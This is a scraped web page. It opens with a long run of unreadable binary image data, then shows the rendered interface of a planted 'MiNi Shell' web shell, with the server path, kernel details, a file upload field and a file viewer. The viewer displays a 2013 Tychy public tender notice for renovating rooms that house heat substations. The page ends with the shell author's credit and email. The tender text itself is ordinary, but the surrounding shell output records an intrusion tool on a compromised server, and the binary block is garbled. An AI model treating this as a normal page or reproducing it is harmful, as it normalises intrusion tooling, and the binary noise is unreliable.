JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130506/177426-N-2013.html

<p class="kh_header"><b>Tychy: REMONT POMIESZCZEŃ TECHNICZNYCH Z PRZEZNACZENIEM DLA MODERNIZOWANYCH  WĘZŁÓW CIEPLNYCH  W RAMACH ZADANIA 
PRZEBUDOWA SYSTEMU CIEPŁOWNICZEGO OSIEDLA  A</b><br>
<b>Numer ogłoszenia: 177426 - 2013; data zamieszczenia: 06.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT POMIESZCZEŃ TECHNICZNYCH Z PRZEZNACZENIEM DLA MODERNIZOWANYCH  WĘZŁÓW CIEPLNYCH  W RAMACH ZADANIA 
PRZEBUDOWA SYSTEMU CIEPŁOWNICZEGO OSIEDLA  A.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane w zakresie remontu pomieszczeń technicznych z przeznaczeniem dla modernizowanych węzłów cieplnych w budynkach mieszkalnych - wielorodzinnych usytuowanych przy ul. Andersa 3a, Andersa 5c, Andersa 6, Andersa 8, Arctowskiego 3, Arkadowej 1a, Arkadowej 3a, Arkadowej 6a, Arkadowej 7b, Wojska Polskiego 1a, Wojska Polskiego 3b,  Wojska Polskiego 5b, Wojska Polskiego 7a w Tychach.
2.	Zakres robót obejmuje:
-	wykonanie robót rozbiórkowych,
-	wymurowanie ścian wewnętrznych z wykonaniem okładziny ściennej z płytek 
      ceramicznych,
-	remont podłóg z wykonaniem posadzek z płytek ceramicznych
-	wymianę stolarki drzwiowej na drzwi przeciwpożarowe
-	wymianę stolarki okiennej na PCV
-	wygłuszenie sufitów wełną mineralną
-	modernizacja instalacji elektrycznej
-	malowanie sufitów wraz z przygotowaniem powierzchni
-	przebudowa instalacji kanalizacyjnej
-	wywóz i utylizacja gruzu
3.	   Roboty przewidują ponadto wykonanie wszelkich niezbędnych prac, które towarzyszą
        niniejszemu zamówieniu.  
4.	Szczegółowy zakres robót określają przedmiary robót.     	
5.	Zamawiający dopuszcza zastosowanie materiałów innych (tzw. równoważnych) o parametrach         
       i właściwościach nie gorszych niż wskazane w przedmiarach robót stanowiących integralną 
       część SIWZ.
6.	W pracach komisji odbiorowej udział wezmą przedstawiciele PEC.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach 
określonych w art. 67 ust.1. pkt. 6) ustawy - Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.25.22-6, 45.44.21.00-8, 45.43.00.00-8, 45.41.00.00-4, 45.44.21.00-8, 45.42.11.30-4, 45.30.00.00-0, 45.31.12.00-2, 45.33.00.00-9, 45.11.12.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5 800,00  zł  (słownie:  pięć tysięcy osiemset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału w postępowaniu dotyczący
       posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy 
       prawa nakładają obowiązek ich posiadania (art. 22 ust. 1 pkt 1ustawy -PZP), Zamawiający 
       wymaga złożenia następujących dokumentów:

           -  decyzja Marszałka Województwa Śląskiego wydana na podstawie art. 104 Kodeksu 
           postępowania administracyjnego oraz art. 17 ust. 1a, art. 21 a ust. 2, art.21b ust.3, ustawy z 
           dnia 27 kwietnia 2001 roku o odpadach ( tekst jednolity Dz. U. z 2010 r. Nr 185, poz. 1234 z 
           późn. zm.) , w sprawie zatwierdzenia programu gospodarki odpadami, odnośnie 
          rodzajów odpadów o kodach:  
          08 01 17 - odpady z usuwania farb, lakierów zawierające rozpuszczalniki organiczne lub 
          inne substancje niebezpieczne  
          08 04 09 - odpady klejowe i szczeliwa zawierające rozpuszczalniki organiczne lub 
          inne substancje niebezpieczne  
          15 02 02 - sorbenty, materiały filtracyjne (w tym filtry olejowe nie ujęte w innych grupach), 
          tkaniny do wycierania (np. szmaty, ścierki) i ubrania ochronne zanieczyszczone 
          substancjami
          17 09 03 - Inne odpady z budowy, remontów i demontażu ( w tym odpady zmieszane) 
          zawierające substancje niebezpieczne.

          Decyzja musi być wystawiona na wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania
    wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia 
    następujących dokumentów: 

1)	 wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem 
          terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
          wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania, w którym należy
          wykazać:
          a)     co najmniej jedną robotę budowlaną obejmującą swym zakresem wykonanie
          remontu pomieszczeń technicznych wraz z robotami instalacyjnymi branży elektrycznej i c.o. 
          (na czynnych sieciach c.o.) , o wartości min. 150 000,00 zł  (brutto) 

        lub
          b)    co najmniej dwie roboty budowlane obejmujące swym zakresem wykonanie remontu 
           pomieszczeń technicznych wraz robotami instalacyjnymi branży elektrycznej i c.o. 
           ( na czynnych sieciach c.o.), o wartości min. 75 000,00 zł  (brutto) każda z robót.
2)	 Do wykazu należy dołączyć:
a)	dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane
           w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki 
           budowlanej i prawidłowo ukończone.
               Dowodami potwierdzającymi , czy roboty wskazane w wykazie zostały wykonane w sposób 
           należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami sztuki budowlanej
           i prawidłowo ukończone są poświadczenia,
          lub
b)	inne dokumenty -  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
           wykonawca nie jest w stanie uzyskać poświadczenia.
           Wykonawca w miejsce poświadczeń może przedkładać dokumenty potwierdzające 
           należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich 
           prawidłowe ukończenie, określone w § 1 pkt 2 rozporządzenia Prezesa Rady Ministrów 
           z dnia 30 grudnia 2009 w sprawie rodzajów dokumentów, jakich może żądać Zamawiający 
           od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 226, 
           poz.1817).
           W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty wskazane 
           w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania 
           poświadczeń , o których mowa powyżej. 

           Wykaz wykonanych robót budowlanych należy sporządzić wg wzoru druku stanowiącego 
           załącznik nr 3 do SIWZ.
          ( W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą                   
           spełniać łącznie  lub co najmniej jeden z wykonawców).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
     osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
     Zamawiający wymaga złożenia następujących dokumentów:  

1.	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, a w szczególności 
           odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
          budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
          i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
          przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
           Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
          w szczególności:
a)	  co najmniej jedną osobą posiadającą uprawnienia budowlane w  specjalności  
     konstrukcyjno - budowlanej  (kierownik robót), z co najmniej 5 letnim doświadczeniem,

b)	  co najmniej jedną osobą posiadającą kwalifikacje typu D uprawniające do zajmowania się 
     eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru w zakresie remontów dla 
     następujących urządzeń instalacji i sieci grupa 2 - Urządzenia wytwarzające, 
     przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne: sieci  
     i instalacji cieplnych wraz z urządzeniami  pomocniczymi o przesyle ciepła powyżej 50 kW. 

c)	  co najmniej dwiema osobami posiadającą kwalifikacje typu E uprawniające do 
      zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji w 
      zakresie remontów dla następujących urządzeń instalacji i sieci grupa 2 - Urządzenia 
      wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia 
      energetyczne: sieci i instalacji cieplnych wraz z urządzeniami  pomocniczymi o przesyle 
      ciepła powyżej 50 kW. 

d)	co najmniej jedną osobą posiadającą kwalifikacje typu D uprawniające do zajmowania 
      się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych na stanowisku dozoru 
     w zakresie remontu i montażu dla następujących urządzeń instalacji i sieci grupa 1 - 
     Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające,  
     przesyłające i zużywające energię elektryczną: urządzenia, instalacje i sieci 
     elektroenergetyczne o napięciu nie wyższym niż 1kV.

e)	co najmniej jedną osobą posiadającą kwalifikacje typu E uprawniające do zajmowania 
      się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych na stanowisku 
      eksploatacji  w zakresie remontu i montażu dla następujących urządzeń instalacji i sieci 
      grupa 1- Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające,  
     przesyłające i zużywające energię elektryczną: urządzenia, instalacje i sieci 
     elektroenergetyczne o napięciu nie wyższym niż 1kV.

              Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik nr 4 do SIWZ.
           (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
            spełniać łącznie lub co najmniej jeden z wykonawców).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), 
           Zamawiający wymaga, złożenia następujących dokumentów: 

1)	  informacji banku lub spółdzielczej kasy oszczędnościowo- kredytowej potwierdzającej 
     wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,   
     wystawionej nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert
   - wymagane jest posiadanie środków finansowych lub zdolności kredytowej na kwotę
     nie mniejszą niż 150 000,00 zł.

2)	 opłaconej polisy, a w przypadku jej braku , innego dokumentu potwierdzającego, że 
     wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
      działalności związanej z przedmiotem zamówienia 
      -   wymagane jest posiadanie ww. dokumentu o wartości ubezpieczenia nie mniejszej 
      niż 150 000,00 zł.
            Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
            musi wynikać z treści dokumentu.
            Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
            jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
            związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
            dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
            opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
    

  (W przypadku podmiotów występujących wspólnie warunki udziału określone w    pkt. 1) i 2) wykonawcy mogą spełniać  łącznie lub co najmniej jeden z wykonawców). 

                                           Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów 
            dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, 
            może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie  
            opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy -  sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ
2)	wypełniony i podpisany formularz oferty cenowej -  sporządzony według wzoru stanowiącego załącznik nr 1a do SIWZ
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)	dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
1)	zmian personalnych, adresowych, formy prawnej stron umowy;
2)	zmiany osoby pełniącej nadzór;
3)	zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT 
4)	zmiany terminu realizacji przedmiotu umowy, w następstwie:
        a)  wystąpienia okoliczności, które nie zostały przewidziane na etapie prowadzenia 
             postępowania;    
        b)  wystąpienia robót dodatkowych nie objętych zamówieniem podstawowym, których   
             wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, 
             jeżeli:
             -   z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od 
             zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów,    
             lub
             -   wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia 
             dodatkowego, 
         c)  wykonania robót zamiennych;
    5)  zmiany sposobu i terminu rozliczeń</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com